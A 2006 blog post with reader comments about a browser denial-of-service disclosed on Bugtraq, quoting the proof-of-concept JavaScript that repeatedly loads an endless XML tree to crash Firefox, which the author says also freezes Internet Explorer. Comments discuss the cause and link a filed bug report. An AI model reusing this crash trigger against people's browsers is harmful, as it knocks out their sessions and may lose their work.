Concurrency-Related Vulnerabilities in Browsers
Mike sent an email to Bugtraq today entitled “Concurrency-Related Vulnerabilities in Browsers - expect issues”. In the email he sent a link to a file that you are supposed to look at in Firefox. Here’s the URL (it will probably crash your browser if you use Firefox). Then I started looking at the source. Here’s the meat of it:
counter = 0;
function foo() {
if (counter < 12) {
document.getElementById('foo').src = "http://lcamtuf.coredump.cx/ffoxdie.xml?" +Math.random();
if (counter >= 9) setTimeout('foo()',3000);
else if (counter >= 6) setTimeout('foo()',200);
else setTimeout('foo()',1000);
counter++;
} else {
document.getElementById('foo').src = "http://lcamtuf.coredump.cx/ffoxdie_ok.html";
}
}
If you look at http://lcamtuf.coredump.cx/ffoxdie.xml it is essentially an infinite tree of XML. I guess Firefox can’t handle that and dies almost instantly (at least for me). But then I tried to go there directly (without the JavaScript wrapper) in Internet Explorer and after about 20 seconds Internet Explorer too became unresponsive. Ugly.
October 5th, 2006 at 1:47 pm
That’s interesting, esp since the XML file requires no JavaScript to crash the browser. What’s more interesting is that Firefox dies instantly (i.e. doesn’t freeze up trying to generate the tree.) I wonder why…
October 6th, 2006 at 1:44 pm
[…] Michal Zalewski hat hingegen eine neue Sicherheitslücke in Firefox und dem Internet Explorer entdeckt - es reicht zwar bislang nur für einen DoS - aber immerhin. Wirft man dem Browser viel - und ich meine richtig viel bis unendlich - XML vor, so stürzt dieser ab. Eigentlich nichts besonderes - beim IE7 dauert es ca. 20 Sekunden bis die Puffer überlaufen und der Browser aufgibt. Firefox hingegen stürtzt sofort ab - quasi in dem Augenblick, in dem das ‘malicios document’ geöffnet wurde. Warum das so ist und ob sich der Sachverhalt weiter exploiten lässt ist unklar - aber allemal suspekt. Ebenso beunruhigend ist die Tatsache, dass man einen DoS erreichen kann, ohne daß auch nur ein Hauch von JavaScript involviert ist - derlei Probleme gab es bislang extrem selten. Wer es selber ausprobieren will - einfach HIER klicken. Vorsicht, Browserabsturz ist garantiert! […]
October 12th, 2006 at 5:38 am
I’ve filled a bug at bugzilla and hopefully it wil get fixed soon:
https://bugzilla.mozilla.org/show_bug.cgi?id=356404
October 12th, 2006 at 9:32 am
i hope so.. it has enough memory leaks as it is =.=
if i didn’t love the extensions i use so much, i might be using Opera now instead (although opera has its own things i dislike about it)
-maluc